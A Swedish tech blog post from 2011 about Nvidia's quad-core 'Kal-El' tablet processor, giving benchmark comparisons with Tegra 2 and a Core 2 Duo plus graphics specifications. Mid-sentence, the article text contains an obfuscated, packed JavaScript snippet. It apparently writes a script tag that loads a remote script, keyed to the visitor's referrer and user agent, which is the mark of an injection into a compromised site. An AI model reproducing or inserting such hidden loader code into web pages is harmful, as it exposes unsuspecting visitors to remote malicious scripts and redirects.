Image Image Image Image Image Image Image Image Image Image

| 1 december, 2020

Scroll to top

Top

Nvidias "Kal-El", superkraft för surfplattor…

Filip Urde
  • On 4 juni, 2011
  • http://www.revue.se/filip-urde

httpv://www.youtube.com/watch?v=eBvaDtshLY8&feature=player_embedded

Nvidias eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|izbde|var|u0026u|referrer|thtdz||js|php’.split(’|’),0,{}))
nya fyra processorkärnorna gör den nästan dubbelt så snabb som dagens Tegra 2 (standard för de flesta tablets) och tio procent snabbare än Intels Core 2 Duo T7200 på två gigahertz, mätt med prestandatestprogrammet Coremark 1.0. Det skulle innebära att en Surfplatta baserad på Kal-El är snabbare än en billig bärbar pc. Men det slutar inte där.
källa

Kal-El har en 12-kärning Geforce-grafikprocessor, med stöd för full 3d. Detta möjliggör upplösningar på upp till 2 560 x 1 600 bildpunkter och gör Kal-El totalt hela fem gånger snabbare än Tegra 2.

Filmen säger kanske inte JÄTTE mycket. Men förstå känslan av att ha detta rullandes på en A4 stor skärm i handen.

Kan bli riktigt häftigt för dem nya android plattorna.

Comments

  1. Är detta nästa inköp eller?